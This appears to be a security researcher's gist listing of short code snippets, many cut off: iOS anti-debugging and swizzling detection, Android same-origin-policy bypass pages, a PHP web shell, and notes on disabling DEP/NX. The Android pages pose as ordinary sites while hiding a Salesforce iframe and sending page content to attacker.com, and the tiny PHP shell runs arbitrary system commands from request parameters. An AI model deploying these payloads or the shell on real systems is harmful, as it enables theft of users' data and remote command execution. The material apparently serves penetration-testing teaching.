Joshua Wright joswr1ght

joswr1ght / iosdebugdetect.cpp

Created December 29, 2014 16:21

Sample code to use ptrace() through dlsym on iOS to terminate when a debugger is attached. NOT FOOLPROOF, but it bypasses Rasticrac decryption.

	// Build on OS X with:
	// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
	#import <dlfcn.h>
	#import <sys/types.h>
	#import <stdio.h>
	typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
	void disable_dbg() {
	ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
	ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
	}

joswr1ght / catchredir.m

Last active June 8, 2021 11:50

Demonstration code to detect runtime method swizzling with Cydia Substrate/Cycript.

	// Compile with:
	// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
	#import <Foundation/Foundation.h>
	#import <stdio.h>
	#import <objc/runtime.h>

	@interface UrlConnection : NSObject
	@property (strong) NSString *url;
	- (void)connect;
	@end

joswr1ght / AndroidWebViewRedirect.html

Last active August 19, 2021 18:15

	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
	parseFloat(spec.getOSVersion()) < 4.2) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";
	iframe.src = "http://attacker.com:8080";
	document.body.appendChild(iframe);

joswr1ght / AndroidSOPTest.html

Created January 12, 2015 21:28

	<html><head></head>
	<body>
	This is just a normal website...
	<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
	<script>
	document.getElementById("if").style.visibility="hidden";
	window.open("javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

joswr1ght / AndroidSOPBypass.html

Created January 12, 2015 21:37

	<html><head></head>
	<body>
	This is just a normal website...
	<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
	<script>
	document.getElementById("if").style.visibility="hidden";
	window.open("\u0000javascript:
	var i=new Image();
	i.src='http://attacker.com/save.php?'+document.body.innerHTML;
	document.body.appendChild(i);

joswr1ght / MetasploitSOPBypass.html

Created January 12, 2015 21:45

	<html><head><script src="Spec.js/lib/Spec.js"></script></head>
	<body>
	This is a normal website. Look at these pictures of cats...
	<script>
	var spec = new Spec();
	if (spec.isDeviceDetected() && spec.getOS() == "Android"
	&& spec.getBrowser != "Chrome"
	&& parseFloat(spec.getOSVersion()) < 4.4) {
	var iframe = document.createElement('iframe');
	iframe.style.display="none";

joswr1ght / tinyphpshell.php

Created February 25, 2015 16:16

TinyPHPShell

	# Attack with http://Site/shell.php?ctime=system&atime=ls+-la or even better a post.
	@extract($_REQUEST);
	@die ($ctime($atime));

joswr1ght / debian-packages-by-size.sh

Created March 5, 2015 14:05

dpkg-query -W --showformat='${Installed-Size;10}\t${Package}\n' | sort -k1,1n

joswr1ght / watchiptables.sh

Created June 8, 2015 15:06

Watch iptables rules

watch -d -n 2 iptables -nvL # Add -t nat for PREROUTING hits

joswr1ght / disabledep.txt

Created October 25, 2015 11:35

Disable DEP/NX on Linux in Grub

	Boot and interrupt the GRUB menu
	Edit the boot configuration, changing the "linux" line by adding these two parameters to the end of the line:
	noexec=off noexec32=off
	Then boot by pressing Ctrl+x.

	After booting, you can check to see if DEP/NX is turned off by running:
	dmesg \| grep NX

	When DEP/NX is turned off you should see something similar to this output: